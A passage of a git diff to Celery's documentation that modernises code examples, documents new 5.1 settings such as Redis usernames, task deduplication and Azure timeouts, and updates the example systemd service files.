- * ``.broadcast`` -> {``app.control.broadcast``}
- * ``.rate_limit`` -> {``app.control.rate_limit``}
- * ``.ping`` -> {``app.control.ping``}
- * ``.revoke`` -> {``app.control.revoke``}
- * ``.discard_all`` -> {``app.control.discard_all``}
- * ``.inspect`` -> {``app.control.inspect``}
-
* ``celery.utils.info``
* ``.humanize_seconds`` -> ``celery.utils.time.humanize_seconds``
* ``.textindent`` -> ``celery.utils.textindent``
@@ -176,7 +157,7 @@ is missing.
from celery.app import app_or_default
- class SomeClass(object):
+ class SomeClass:
def __init__(self, app=None):
self.app = app_or_default(app)
diff --git a/docs/internals/deprecation.rst b/docs/internals/deprecation.rst
index 222dd6644d9..23d03ad36f7 100644
--- a/docs/internals/deprecation.rst
+++ b/docs/internals/deprecation.rst
@@ -34,7 +34,7 @@ Compat Task Modules
from celery import task
-- Module ``celery.task`` *may* be removed (not decided)
+- Module ``celery.task`` will be removed
This means you should change:
@@ -44,10 +44,21 @@ Compat Task Modules
into:
+ .. code-block:: python
+
+ from celery import shared_task
+
+ -- and:
.. code-block:: python
from celery import task
+ into:
+
+ .. code-block:: python
+
+ from celery import shared_task
+
-- and:
.. code-block:: python
diff --git a/docs/internals/guide.rst b/docs/internals/guide.rst
index e7d600da275..731cacbaac4 100644
--- a/docs/internals/guide.rst
+++ b/docs/internals/guide.rst
@@ -53,10 +53,10 @@ Naming
pass
# - "action" class (verb)
- class UpdateTwitterStatus(object): # BAD
+ class UpdateTwitterStatus: # BAD
pass
- class update_twitter_status(object): # GOOD
+ class update_twitter_status: # GOOD
pass
.. note::
@@ -71,7 +71,7 @@ Naming
.. code-block:: python
- class Celery(object):
+ class Celery:
def consumer_factory(self): # BAD
...
@@ -89,7 +89,7 @@ as this means that they can be set by either instantiation or inheritance.
.. code-block:: python
- class Producer(object):
+ class Producer:
active = True
serializer = 'json'
@@ -130,7 +130,7 @@ the exception class from the instance directly.
class Empty(Exception):
pass
- class Queue(object):
+ class Queue:
Empty = Empty
def get(self):
@@ -157,7 +157,7 @@ saved us from many a monkey patch).
.. code-block:: python
- class Worker(object):
+ class Worker:
Consumer = Consumer
def __init__(self, connection, consumer_cls=None):
diff --git a/docs/internals/protocol.rst b/docs/internals/protocol.rst
index 196077213c8..72f461dc936 100644
--- a/docs/internals/protocol.rst
+++ b/docs/internals/protocol.rst
@@ -49,6 +49,7 @@ Definition
'argsrepr': str repr(args),
'kwargsrepr': str repr(kwargs),
'origin': str nodename,
+ 'replaced_task_nesting': int
}
body = (
@@ -168,7 +169,7 @@ Changes from version 1
def apply_async(self, args, kwargs, **options):
fun, real_args = self.unpack_args(*args)
- return super(PickleTask, self).apply_async(
+ return super().apply_async(
(fun, real_args, kwargs), shadow=qualname(fun), **options
)
diff --git a/docs/make.bat b/docs/make.bat
index a75aa4e2866..045f00bf8c5 100644
--- a/docs/make.bat
+++ b/docs/make.bat
@@ -19,6 +19,7 @@ if "%1" == "help" (
:help
echo.Please use `make ^` where ^ is one of
echo. html to make standalone HTML files
+ echo. livehtml to start a local server hosting the docs
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
@@ -269,4 +270,9 @@ if "%1" == "pseudoxml" (
goto end
)
+if "%1" == "livehtml" (
+ sphinx-autobuild -b html --open-browser -p 7000 --watch %APP% -c . %SOURCEDIR% %BUILDDIR%/html
+ goto end
+)
+
:end
diff --git a/docs/reference/celery.bin.amqp.rst b/docs/reference/celery.bin.amqp.rst
deleted file mode 100644
index 8de8bf00de7..00000000000
--- a/docs/reference/celery.bin.amqp.rst
+++ /dev/null
@@ -1,11 +0,0 @@
-===========================================================
- ``celery.bin.amqp``
-===========================================================
-
-.. contents::
- :local:
-.. currentmodule:: celery.bin.amqp
-
-.. automodule:: celery.bin.amqp
- :members:
- :undoc-members:
diff --git a/docs/reference/cli.rst b/docs/reference/cli.rst
index cff2291d4ed..6432b7e300a 100644
--- a/docs/reference/cli.rst
+++ b/docs/reference/cli.rst
@@ -4,4 +4,4 @@
.. click:: celery.bin.celery:celery
:prog: celery
- :show-nested:
+ :nested: full
diff --git a/docs/userguide/application.rst b/docs/userguide/application.rst
index 1e6c4cf13ae..502353d1013 100644
--- a/docs/userguide/application.rst
+++ b/docs/userguide/application.rst
@@ -257,7 +257,7 @@ You can then specify the configuration module to use via the environment:
.. code-block:: console
- $ CELERY_CONFIG_MODULE="celeryconfig.prod" celery worker -l info
+ $ CELERY_CONFIG_MODULE="celeryconfig.prod" celery worker -l INFO
.. _app-censored-config:
@@ -360,19 +360,15 @@ Finalizing the object will:
.. topic:: The "default app"
Celery didn't always have applications, it used to be that
- there was only a module-based API, and for backwards compatibility
- the old API is still there until the release of Celery 5.0.
+ there was only a module-based API. A compatibility API was
+ available at the old location until the release of Celery 5.0,
+ but has been removed.
Celery always creates a special app - the "default app",
and this is used if no custom application has been instantiated.
- The :mod:`celery.task` module is there to accommodate the old API,
- and shouldn't be used if you use a custom app. You should
- always use the methods on the app instance, not the module based API.
-
- For example, the old Task base class enables many compatibility
- features where some may be incompatible with newer features, such
- as task methods:
+ The :mod:`celery.task` module is no longer available. Use the
+ methods on the app instance, not the module based API:
.. code-block:: python
@@ -380,9 +376,6 @@ Finalizing the object will:
from celery import Task # << NEW base class.
- The new base class is recommended even if you use the old
- module-based API.
-
Breaking the chain
==================
@@ -400,7 +393,7 @@ The following example is considered bad practice:
from celery import current_app
- class Scheduler(object):
+ class Scheduler:
def run(self):
app = current_app
@@ -409,7 +402,7 @@ Instead it should take the ``app`` as an argument:
.. code-block:: python
- class Scheduler(object):
+ class Scheduler:
def __init__(self, app):
self.app = app
@@ -421,7 +414,7 @@ so that everything also works in the module-based compatibility API
from celery.app import app_or_default
- class Scheduler(object):
+ class Scheduler:
def __init__(self, app=None):
self.app = app_or_default(app)
@@ -431,7 +424,7 @@ chain breaks:
.. code-block:: console
- $ CELERY_TRACE_APP=1 celery worker -l info
+ $ CELERY_TRACE_APP=1 celery worker -l INFO
.. topic:: Evolving the API
@@ -456,7 +449,7 @@ chain breaks:
.. code-block:: python
- from celery.task import Task
+ from celery import Task
from celery.registry import tasks
class Hello(Task):
@@ -475,16 +468,16 @@ chain breaks:
.. code-block:: python
- from celery.task import task
+ from celery import app
- @task(queue='hipri')
+ @app.task(queue='hipri')
def hello(to):
return 'hello {0}'.format(to)
Abstract Tasks
==============
-All tasks created using the :meth:`~@task` decorator
+All tasks created using the :meth:`@task` decorator
will inherit from the application's base :attr:`~@Task` class.
You can specify a different base class using the ``base`` argument:
@@ -513,7 +506,7 @@ class: :class:`celery.Task`.
If you override the task's ``__call__`` method, then it's very important
that you also call ``self.run`` to execute the body of the task. Do not
- call ``super().__call__``. The ``__call__`` method of the neutral base
+ call ``super().__call__``. The ``__call__`` method of the neutral base
class :class:`celery.Task` is only present for reference. For optimization,
this has been unrolled into ``celery.app.trace.build_tracer.trace_task``
which calls ``run`` directly on the custom task class if no ``__call__``
diff --git a/docs/userguide/calling.rst b/docs/userguide/calling.rst
index 04c7f9ba718..8bfe52feef4 100644
--- a/docs/userguide/calling.rst
+++ b/docs/userguide/calling.rst
@@ -135,23 +135,18 @@ task that adds 16 to the previous result, forming the expression
You can also cause a callback to be applied if task raises an exception
-(*errback*), but this behaves differently from a regular callback
-in that it will be passed the id of the parent task, not the result.
-This is because it may not always be possible to serialize
-the exception raised, and so this way the error callback requires
-a result backend to be enabled, and the task must retrieve the result
-of the task instead.
+(*errback*). The worker won't actually call the errback as a task, but will
+instead call the errback function directly so that the raw request, exception
+and traceback objects can be passed to it.
This is an example error callback:
.. code-block:: python
@app.task
- def error_handler(uuid):
- result = AsyncResult(uuid)
- exc = result.get(propagate=False)
+ def error_handler(request, exc, traceback):
print('Task {0} raised exception: {1!r}\n{2!r}'.format(
- uuid, exc, result.traceback))
+ request.id, exc, traceback))
it can be added to the task using the ``link_error`` execution
option:
@@ -257,6 +252,31 @@ and timezone information):
>>> tomorrow = datetime.utcnow() + timedelta(days=1)
>>> add.apply_async((2, 2), eta=tomorrow)
+.. warning::
+
+ When using RabbitMQ as a message broker and specifying a ``countdown``
+ over 15 minutes, you may encounter a problem where the worker terminates
+ because an :exc:`~amqp.exceptions.PreconditionFailed` error is raised:
+
+ .. code-block:: pycon
+
+ amqp.exceptions.PreconditionFailed: (0, 0): (406) PRECONDITION_FAILED - consumer ack timed out on channel
+
+ Since RabbitMQ version 3.8.15, the default value for
+ ``consumer_timeout`` is 15 minutes.
+ In version 3.8.17 it was increased to 30 minutes. If a consumer does
+ not ack its delivery for more than the timeout value, its channel will be
+ closed with a ``PRECONDITION_FAILED`` channel exception.
+ See `Delivery Acknowledgement Timeout`_ for more information.
+
+ To solve the problem, set the ``consumer_timeout`` parameter in the RabbitMQ
+ configuration file ``rabbitmq.conf`` to a value greater than or equal to
+ your countdown value. For example, you can specify a very large value
+ of ``consumer_timeout = 31622400000``, which is equal to 1 year
+ in milliseconds, to avoid problems in the future.
+
+.. _`Delivery Acknowledgement Timeout`: https://www.rabbitmq.com/consumers.html#acknowledgement-timeout
+
.. _calling-expiration:
Expiration
@@ -692,7 +712,7 @@ the workers :option:`-Q ` argument:
.. code-block:: console
- $ celery -A proj worker -l info -Q celery,priority.high
+ $ celery -A proj worker -l INFO -Q celery,priority.high
.. seealso::
@@ -711,13 +731,13 @@ setting or by using the ``ignore_result`` option:
.. code-block:: pycon
- >>> result = add.apply_async(1, 2, ignore_result=True)
+ >>> result = add.apply_async((1, 2), ignore_result=True)
>>> result.get()
None
>>> # Do not ignore result (default)
...
- >>> result = add.apply_async(1, 2, ignore_result=False)
+ >>> result = add.apply_async((1, 2), ignore_result=False)
>>> result.get()
3
diff --git a/docs/userguide/canvas.rst b/docs/userguide/canvas.rst
index fdfcaf2719a..45912a6d2c9 100644
--- a/docs/userguide/canvas.rst
+++ b/docs/userguide/canvas.rst
@@ -569,7 +569,7 @@ Here's an example errback:
def log_error(request, exc, traceback):
with open(os.path.join('/var/errors', request.id), 'a') as fh:
print('--\n\n{0} {1} {2}'.format(
- task_id, exc, traceback), file=fh)
+ request.id, exc, traceback), file=fh)
To make it even easier to link tasks together there's
a special signature called :class:`~celery.chain` that lets
@@ -688,6 +688,52 @@ Group also supports iterators:
A group is a signature object, so it can be used in combination
with other signatures.
+.. _group-callbacks:
+
+Group Callbacks and Error Handling
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Groups can have callback and errback signatures linked to them as well, however
+the behaviour can be somewhat surprising due to the fact that groups are not
+real tasks and simply pass linked tasks down to their encapsulated signatures.
+This means that the return values of a group are not collected to be passed to
+a linked callback signature.
+As an example, the following snippet using a simple `add(a, b)` task is faulty
+since the linked `add.s()` signature will not receive the finalised group
+result as one might expect.
+
+.. code-block:: pycon
+
+ >>> g = group(add.s(2, 2), add.s(4, 4))
+ >>> g.link(add.s())
+ >>> res = g()
+ >>> res.get()
+ [4, 8]
+
+Note that the finalised results of the first two tasks are returned, but the
+callback signature will have run in the background and raised an exception
+since it did not receive the two arguments it expects.
+
+Group errbacks are passed down to encapsulated signatures as well which opens
+the possibility for an errback linked only once to be called more than once if
+multiple tasks in a group were to fail.
+As an example, the following snippet using a `fail()` task which raises an
+exception can be expected to invoke the `log_error()` signature once for each
+failing task which gets run in the group.
+
+.. code-block:: pycon
+
+ >>> g = group(fail.s(), fail.s())
+ >>> g.link_error(log_error.s())
+ >>> res = g()
+
+With this in mind, it's generally advisable to create idempotent or counting
+tasks which are tolerant to being called repeatedly for use as errbacks.
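+
+As an illustrative sketch (a variation of the ``log_error`` errback shown
+earlier, assuming the same ``app`` instance), an errback can be made tolerant
+to repeated invocation by keying its side effect on the request id, so that
+running it again for the same failed task simply overwrites the previous
+record:
+
+.. code-block:: python
+
+    import os
+
+    @app.task
+    def log_group_error(request, exc, traceback):
+        # One file per failed task id: calling this errback twice for the
+        # same task has no additional effect.
+        with open(os.path.join('/var/errors', request.id), 'w') as fh:
+            print('--\n\n{0} {1} {2}'.format(
+                request.id, exc, traceback), file=fh)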
+
+These use cases are better addressed by the :class:`~celery.chord` class which
+is supported on certain backend implementations.
+
+.. _group-results:
+
Group Results
~~~~~~~~~~~~~
@@ -884,6 +930,12 @@ an errback to the chord callback:
>>> c = (group(add.s(i, i) for i in range(10)) |
... xsum.s().on_error(on_chord_error.s())).delay()
+Chords may have callback and errback signatures linked to them, which addresses
+some of the issues with linking signatures to groups.
+Doing so will link the provided signature to the chord's body which can be
+expected to gracefully invoke callbacks just once upon completion of the body,
+or errbacks just once if any task in the chord header or body fails.
+
.. _chord-important-notes:
Important Notes
@@ -951,7 +1003,7 @@ implemented in other backends (suggestions welcome!).
def after_return(self, *args, **kwargs):
do_something()
- super(MyTask, self).after_return(*args, **kwargs)
+ super().after_return(*args, **kwargs)
.. _canvas-map:
@@ -959,11 +1011,11 @@ Map & Starmap
-------------
:class:`~celery.map` and :class:`~celery.starmap` are built-in tasks
-that calls the task for every element in a sequence.
+that call the provided task for every element in a sequence.
-They differ from group in that
+They differ from :class:`~celery.group` in that:
-- only one task message is sent
+- only one task message is sent.
- the operation is sequential.
@@ -1013,7 +1065,7 @@ Chunks
------
Chunking lets you divide an iterable of work into pieces, so that if
-you have one million objects, you can create 10 tasks with hundred
+you have one million objects, you can create 10 tasks with a hundred
thousand objects each.
Some may worry that chunking your tasks results in a degradation
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 67b3bf96846..52797df39fe 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -107,6 +107,7 @@ have been moved into a new ``task_`` prefix.
``CELERY_REDIS_DB`` :setting:`redis_db`
``CELERY_REDIS_HOST`` :setting:`redis_host`
``CELERY_REDIS_MAX_CONNECTIONS`` :setting:`redis_max_connections`
+``CELERY_REDIS_USERNAME`` :setting:`redis_username`
``CELERY_REDIS_PASSWORD`` :setting:`redis_password`
``CELERY_REDIS_PORT`` :setting:`redis_port`
``CELERY_REDIS_BACKEND_USE_SSL`` :setting:`redis_backend_use_ssl`
@@ -115,7 +116,7 @@ have been moved into a new ``task_`` prefix.
``CELERY_MESSAGE_COMPRESSION`` :setting:`result_compression`
``CELERY_RESULT_EXCHANGE`` :setting:`result_exchange`
``CELERY_RESULT_EXCHANGE_TYPE`` :setting:`result_exchange_type`
-``CELERY_TASK_RESULT_EXPIRES`` :setting:`result_expires`
+``CELERY_RESULT_EXPIRES`` :setting:`result_expires`
``CELERY_RESULT_PERSISTENT`` :setting:`result_persistent`
``CELERY_RESULT_SERIALIZER`` :setting:`result_serializer`
``CELERY_RESULT_DBURI`` Use :setting:`result_backend` instead.
@@ -146,8 +147,9 @@ have been moved into a new ``task_`` prefix.
``CELERY_SEND_SENT_EVENT`` :setting:`task_send_sent_event`
``CELERY_SERIALIZER`` :setting:`task_serializer`
``CELERYD_SOFT_TIME_LIMIT`` :setting:`task_soft_time_limit`
+``CELERY_TASK_TRACK_STARTED`` :setting:`task_track_started`
+``CELERY_TASK_REJECT_ON_WORKER_LOST`` :setting:`task_reject_on_worker_lost`
``CELERYD_TIME_LIMIT`` :setting:`task_time_limit`
-``CELERY_TRACK_STARTED`` :setting:`task_track_started`
``CELERYD_AGENT`` :setting:`worker_agent`
``CELERYD_AUTOSCALER`` :setting:`worker_autoscaler`
``CELERYD_CONCURRENCY`` :setting:`worker_concurrency`
@@ -317,7 +319,7 @@ instead of a dict to choose the tasks to annotate:
.. code-block:: python
- class MyAnnotate(object):
+ class MyAnnotate:
def annotate(self, task):
if task.name.startswith('tasks.'):
@@ -426,6 +428,23 @@ propagate exceptions.
It's the same as always running ``apply()`` with ``throw=True``.
+.. setting:: task_store_eager_result
+
+``task_store_eager_result``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. versionadded:: 5.1
+
+Default: Disabled.
+
+If this is :const:`True` and :setting:`task_always_eager` is :const:`True`
+and :setting:`task_ignore_result` is :const:`False`,
+the results of eagerly executed tasks will be saved to the backend.
+
+By default, even with :setting:`task_always_eager` set to :const:`True`
+and :setting:`task_ignore_result` set to :const:`False`,
+the result will not be saved.
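+
+A short sketch of the combination of settings needed for eager results to be
+stored (the backend URL is a placeholder):
+
+.. code-block:: python
+
+    task_always_eager = True
+    task_ignore_result = False
+    task_store_eager_result = True
+    result_backend = 'redis://localhost:6379/0'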
+
.. setting:: task_remote_tracebacks
``task_remote_tracebacks``
@@ -465,7 +484,7 @@ you can set :setting:`task_store_errors_even_if_ignored`.
Default: Disabled.
If set, the worker stores all task errors in the result store even if
-:attr:`Task.ignore_result ` is on.
+:attr:`Task.ignore_result ` is on.
.. setting:: task_track_started
@@ -836,6 +855,28 @@ Default interval for retrying chord tasks.
.. _conf-database-result-backend:
+
+.. setting:: override_backends
+
+``override_backends``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: Disabled by default.
+
+Path to the class that implements the backend.
+
+Allows you to override the backend implementation.
+This can be useful if you need to store additional metadata about executed tasks,
+override retry policies, etc.
+
+Example:
+
+.. code-block:: python
+
+ override_backends = {"db": "custom_module.backend.class"}
+
+
+
Database backend settings
-------------------------
@@ -1028,9 +1069,13 @@ setting:
``cache_backend``
~~~~~~~~~~~~~~~~~
-This setting is no longer used as it's now possible to specify
+This setting is no longer used in Celery's built-in backends as it's now possible to specify
the cache backend directly in the :setting:`result_backend` setting.
+.. note::
+
+ The :ref:`django-celery-results` library uses ``cache_backend`` for choosing django caches.
+
.. _conf-mongodb-result-backend:
MongoDB backend settings
@@ -1105,7 +1150,7 @@ Configuring the backend URL
This backend requires the :setting:`result_backend`
setting to be set to a Redis or `Redis over TLS`_ URL::
- result_backend = 'redis://:password@host:port/db'
+ result_backend = 'redis://username:password@host:port/db'
.. _`Redis over TLS`:
https://www.iana.org/assignments/uri-schemes/prov/rediss
@@ -1120,7 +1165,7 @@ is the same as::
Use the ``rediss://`` protocol to connect to redis over TLS::
- result_backend = 'rediss://:password@host:port/db?ssl_cert_reqs=required'
+ result_backend = 'rediss://username:password@host:port/db?ssl_cert_reqs=required'
Note that the ``ssl_cert_reqs`` string should be one of ``required``,
``optional``, or ``none`` (though, for backwards compatibility, the string
@@ -1132,6 +1177,20 @@ If a Unix socket connection should be used, the URL needs to be in the format:::
The fields of the URL are defined as follows:
+#. ``username``
+
+ .. versionadded:: 5.1.0
+
+ Username used to connect to the database.
+
+ Note that this is only supported in Redis>=6.0 and with py-redis>=3.4.0
+ installed.
+
+ If you use an older database version or an older client version
+ you can omit the username::
+
+ result_backend = 'redis://:password@host:port/db'
+
#. ``password``
Password used to connect to the database.
@@ -1163,6 +1222,22 @@ Note that the ``ssl_cert_reqs`` string should be one of ``required``,
``optional``, or ``none`` (though, for backwards compatibility, the string
may also be one of ``CERT_REQUIRED``, ``CERT_OPTIONAL``, ``CERT_NONE``).
+
+.. setting:: redis_backend_health_check_interval
+
+.. versionadded:: 5.1.0
+
+``redis_backend_health_check_interval``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: Not configured
+
+The Redis backend supports health checks. This value must be
+set as an integer whose value is the number of seconds between
+health checks. If a ConnectionError or a TimeoutError is
+encountered during the health check, the connection will be
+re-established and the command retried exactly once.
+
.. setting:: redis_backend_use_ssl
``redis_backend_use_ssl``
@@ -1507,6 +1582,19 @@ Default: celery.
The name for the storage container in which to store the results.
+.. setting:: azureblockblob_base_path
+
+``azureblockblob_base_path``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. versionadded:: 5.1
+
+Default: None.
+
+A base path in the storage container to use to store result keys. For example::
+
+ azureblockblob_base_path = 'prefix/'
+
.. setting:: azureblockblob_retry_initial_backoff_sec
``azureblockblob_retry_initial_backoff_sec``
@@ -1533,6 +1621,24 @@ Default: 3.
The maximum number of retry attempts.
+.. setting:: azureblockblob_connection_timeout
+
+``azureblockblob_connection_timeout``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: 20.
+
+Timeout in seconds for establishing the Azure Block Blob connection.
+
+.. setting:: azureblockblob_read_timeout
+
+``azureblockblob_read_timeout``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Default: 120.
+
+Timeout in seconds for reading an Azure Block Blob.
+
.. _conf-elasticsearch-result-backend:
Elasticsearch backend settings
@@ -1818,6 +1924,16 @@ This is a dict supporting the following keys:
Password to authenticate to the ArangoDB server (optional).
+* ``http_protocol``
+
+ HTTP Protocol in ArangoDB server connection.
+ Defaults to ``http``.
+
+* ``verify``
+
+ HTTPS Verification check while creating the ArangoDB connection.
+ Defaults to ``False``.
+
.. _conf-cosmosdbsql-result-backend:
CosmosDB backend settings (experimental)
@@ -1950,14 +2066,52 @@ without any further configuration. For larger clusters you could use NFS,
Consul K/V store backend settings
---------------------------------
-The Consul backend can be configured using a URL, for example:
+.. note::
+
+ The Consul backend requires the :pypi:`python-consul2` library:
+
+ To install this package use :command:`pip`:
+
+ .. code-block:: console
+
+ $ pip install python-consul2
+
+The Consul backend can be configured using a URL, for example::
CELERY_RESULT_BACKEND = 'consul://localhost:8500/'
-The backend will storage results in the K/V store of Consul
-as individual keys.
+or::
+
+ result_backend = 'consul://localhost:8500/'
+
+The backend will store results in the K/V store of Consul
+as individual keys. The backend supports automatic expiry of results using TTLs in
+Consul. The full syntax of the URL is::
+
+ consul://host:port[?one_client=1]
+
+The URL is formed out of the following parts:
+
+* ``host``
+
+ Host name of the Consul server.
+
+* ``port``
-The backend supports auto expire of results using TTLs in Consul.
+ The port the Consul server is listening to.
+
+* ``one_client``
+
+ By default, for correctness, the backend uses a separate client connection
+ per operation. In cases of extreme load, the rate of creation of new
+ connections can cause HTTP 429 "too many connections" error responses from
+ the Consul server. The recommended way to handle this is to
+ enable retries in ``python-consul2`` using the patch at
+ https://github.com/poppyred/python-consul2/pull/31.
+
+ Alternatively, if ``one_client`` is set, a single client connection will be
+ used for all operations instead. This should eliminate the HTTP 429 errors,
+ but the storage of results in the backend can become unreliable.
.. _conf-messaging:
@@ -2028,7 +2182,7 @@ Examples:
},
}
- task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default})
+ task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default'})
Where ``myapp.tasks.route_task`` could be:
@@ -2066,7 +2220,7 @@ the final message options will be:
immediate=False, exchange='video', routing_key='video.compress'
(and any default message options defined in the
-:class:`~celery.task.base.Task` class)
+:class:`~celery.app.task.Task` class)
Values defined in :setting:`task_routes` have precedence over values defined in
:setting:`task_queues` when merging the two.
@@ -2100,33 +2254,6 @@ The final routing options for ``tasks.add`` will become:
See :ref:`routers` for more examples.
-.. setting:: task_queue_ha_policy
-
-``task_queue_ha_policy``
-~~~~~~~~~~~~~~~~~~~~~~~~
-:brokers: RabbitMQ
-
-Default: :const:`None`.
-
-This will set the default HA policy for a queue, and the value
-can either be a string (usually ``all``):
-
-.. code-block:: python
-
- task_queue_ha_policy = 'all'
-
-Using 'all' will replicate the queue to all current nodes,
-Or you can give it a list of nodes to replicate to:
-
-.. code-block:: python
-
- task_queue_ha_policy = ['rabbit@host1', 'rabbit@host2']
-
-Using a list will implicitly set ``x-ha-policy`` to 'nodes' and
-``x-ha-policy-params`` to the given list of nodes.
-
-See http://www.rabbitmq.com/ha.html for more information.
-
.. setting:: task_queue_max_priority
``task_queue_max_priority``
@@ -2577,6 +2704,33 @@ to have different import categories.
The modules in this setting are imported after the modules in
:setting:`imports`.
+.. setting:: worker_deduplicate_successful_tasks
+
+``worker_deduplicate_successful_tasks``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. versionadded:: 5.1
+
+Default: False
+
+Before each task execution, instruct the worker to check if this task is
+a duplicate message.
+
+Deduplication occurs only with tasks that have the same identifier,
+enabled late acknowledgment, were redelivered by the message broker
+and their state is ``SUCCESS`` in the result backend.
+
+To avoid overflowing the result backend with queries, a local cache of
+successfully executed tasks is checked before querying the result backend
+in case the task was already successfully executed by the same worker that
+received the task.
+
+This cache can be made persistent by setting the :setting:`worker_state_db`
+setting.
+
+If the result backend is not persistent (the RPC backend, for example),
+this setting is ignored.
+
.. _conf-concurrency:
.. setting:: worker_concurrency
@@ -2711,6 +2865,36 @@ Default: 4.0.
The timeout in seconds (int/float) when waiting for a new worker process to start up.
+.. setting:: worker_cancel_long_running_tasks_on_connection_loss
+
+``worker_cancel_long_running_tasks_on_connection_loss``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. versionadded:: 5.1
+
+Default: Disabled by default.
+
+Kill all long-running tasks with late acknowledgment enabled on connection loss.
+
+Tasks which have not been acknowledged before the connection loss cannot do so
+anymore since their channel is gone and the task is redelivered back to the queue.
+This is why tasks with late acknowledgment enabled must be idempotent, as they may be executed more than once.
+In that case, the task may be executed twice per connection loss (and sometimes in parallel in other workers).
+
+When turning this option on, those tasks which have not been completed are
+cancelled and their execution is terminated.
+Tasks which have completed in any way before the connection loss
+are recorded as such in the result backend as long as :setting:`task_ignore_result` is not enabled.
+
+.. warning::
+
+ This feature was introduced as a future breaking change.
+ If it is turned off, Celery will emit a warning message.
+
+ In Celery 6.0, the :setting:`worker_cancel_long_running_tasks_on_connection_loss`
+ will be set to ``True`` by default as the current behavior leads to more
+ problems than it solves.
+
.. _conf-events:
Events
@@ -2910,7 +3094,7 @@ Default:
.. code-block:: text
"[%(asctime)s: %(levelname)s/%(processName)s]
- [%(task_name)s(%(task_id)s)] %(message)s"
+ %(task_name)s[%(task_id)s]: %(message)s"
The format to use for log messages logged in tasks.
diff --git a/docs/userguide/daemonizing.rst b/docs/userguide/daemonizing.rst
index 07e39009c97..c2ea8a57645 100644
--- a/docs/userguide/daemonizing.rst
+++ b/docs/userguide/daemonizing.rst
@@ -389,31 +389,39 @@ This is an example systemd file:
.. code-block:: bash
- [Unit]
- Description=Celery Service
- After=network.target
-
- [Service]
- Type=forking
- User=celery
- Group=celery
- EnvironmentFile=/etc/conf.d/celery
- WorkingDirectory=/opt/celery
- ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} multi start ${CELERYD_NODES} \
- --pidfile=${CELERYD_PID_FILE} \
- --logfile=${CELERYD_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL} ${CELERYD_OPTS}'
- ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait ${CELERYD_NODES} \
- --pidfile=${CELERYD_PID_FILE}'
- ExecReload=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} multi restart ${CELERYD_NODES} \
- --pidfile=${CELERYD_PID_FILE} \
- --logfile=${CELERYD_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL} ${CELERYD_OPTS}'
-
- [Install]
- WantedBy=multi-user.target
+ [Unit]
+ Description=Celery Service
+ After=network.target
+
+ [Service]
+ Type=forking
+ User=celery
+ Group=celery
+ EnvironmentFile=/etc/conf.d/celery
+ WorkingDirectory=/opt/celery
+ ExecStart=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi start $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
+ ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --loglevel="${CELERYD_LOG_LEVEL}"'
+ ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
+ Restart=always
+
+ [Install]
+ WantedBy=multi-user.target
Once you've put that file in :file:`/etc/systemd/system`, you should run
:command:`systemctl daemon-reload` in order that Systemd acknowledges that file.
You should also run that command each time you modify it.
+Use :command:`systemctl enable celery.service` if you want the celery service to
+automatically start when (re)booting the system.
+
+Optionally you can specify extra dependencies for the celery service: e.g. if you use
+RabbitMQ as a broker, you could specify ``rabbitmq-server.service`` in both ``After=`` and ``Requires=``
+in the ``[Unit]`` `systemd section `_.
To configure user, group, :command:`chdir` change settings:
``User``, ``Group``, and ``WorkingDirectory`` defined in
@@ -425,7 +433,7 @@ You can also use systemd-tmpfiles in order to create working directories (for lo
.. code-block:: bash
- d /var/run/celery 0755 celery celery -
+ d /run/celery 0755 celery celery -
d /var/log/celery 0755 celery celery -
@@ -482,23 +490,29 @@ This is an example systemd file for Celery Beat:
.. code-block:: bash
- [Unit]
- Description=Celery Beat Service
- After=network.target
+ [Unit]
+ Description=Celery Beat Service
+ After=network.target
- [Service]
- Type=simple
- User=celery
- Group=celery
- EnvironmentFile=/etc/conf.d/celery
- WorkingDirectory=/opt/celery
- ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \
- --pidfile=${CELERYBEAT_PID_FILE} \
- --logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}'
+ [Service]
+ Type=simple
+ User=celery
+ Group=celery
+ EnvironmentFile=/etc/conf.d/celery
+ WorkingDirectory=/opt/celery
+ ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \
+ --pidfile=${CELERYBEAT_PID_FILE} \
+ --logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}'
+ Restart=always
- [Install]
- WantedBy=multi-user.target
+ [Install]
+ WantedBy=multi-user.target
+Once you've put that file in :file:`/etc/systemd/system`, you should run
